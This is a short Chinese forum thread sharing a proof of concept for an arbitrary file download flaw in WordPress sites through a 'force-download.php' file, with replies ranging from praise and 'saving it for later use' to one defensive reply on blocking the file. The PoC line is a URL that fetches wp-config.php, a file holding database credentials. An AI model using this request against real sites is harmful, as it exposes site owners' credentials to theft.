Wordpress强制下载任意文件下载漏洞
####################### PoC
######################
# [+] Using `force-download.php` file from `Wordpress websites we can download any file.
#
# [!] http://ihonker.org/force-download.php?file=wp-config.php
#
###################### 试了试貌似不是所有的都管用
RE: Wordpress强制下载任意文件下载漏洞
666,这么出名的程序居然还有漏洞。 收藏以后用!! 没看懂!{:2_25:} 我也没看懂 哪个版本的? 好思路!! 谢谢分享Re: Wordpress强制下载任意文件下载漏洞
这个漏洞看起来挺危险的,直接通过 `force-download.php` 传入文件路径就能下载任意文件。如果站点的 `wp-config.php` 被下载,数据库信息就全暴露了。建议先检查一下网站根目录下是否存在这个文件,如果存在但并非自己部署的,大概率是被植入了后门;如果是主题或插件自带的,也要确认是否有权限校验。临时缓解可以先通过 `.htaccess` 或 Nginx 配置禁止直接访问该 PHP 文件,同时排查一下文件来源。
页:
[1]